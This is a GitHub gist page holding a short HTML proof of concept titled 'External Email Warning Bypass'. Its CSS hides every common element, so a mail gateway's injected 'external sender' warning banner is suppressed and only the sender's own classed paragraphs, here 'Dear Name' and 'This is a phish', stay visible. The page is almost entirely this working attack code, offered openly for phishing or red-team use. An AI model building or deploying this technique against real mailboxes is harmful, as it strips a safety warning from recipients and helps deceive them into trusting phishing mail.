Skip to content

Instantly share code, notes, and snippets.

@Xenov-X
Forked from knavesec/poc.html
Created April 28, 2021 11:13
Show Gist options
  • Select an option

  • Save Xenov-X/e4cc7dba7fae1d68c62b3856d68ffcf8 to your computer and use it in GitHub Desktop.

Select an option

Save Xenov-X/e4cc7dba7fae1d68c62b3856d68ffcf8 to your computer and use it in GitHub Desktop.
External Email Warning Bypass
<!DOCTYPE html>
<html>
<head>
<title></title>
<style type="text/css">
body {
display: none !important;
background:#FFFFFF !important;
}
.id3 {
display: block !important;
}
div[style] {
display: none !important;
background:#FFFFFF !important;
}
p {
display: none !important;
background:#FFFFFF !important;
}
p[style] {
display: none !important;
background:#FFFFFF !important;
}
span {
display: none !important;
background: #FFFFFF !important;
}
span[style] {
display: none !important;
background:#FFFFFF !important;
}
table[style] {
display: none !important;
background:#FFFFFF !important;
}
table {
display: none !important;
background:#FFFFFF !important;
}
td {
display: none !important;
background:#FFFFFF !important;
}
td[style] {
display: none !important;
background:#FFFFFF !important;
}
tr {
display: none !important;
background:#FFFFFF !important;
}
tr[style] {
display: none !important;
background:#FFFFFF !important;
}
tbody {
background:#FFFFFF !important;
display: none !important;
}
tbody[style] {
display: none !important;
background:#FFFFFF !important;
}
</style>
</head>
<body>
<p class="id3">Dear Name,</p>
<p class="id3">This is a phish</p>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment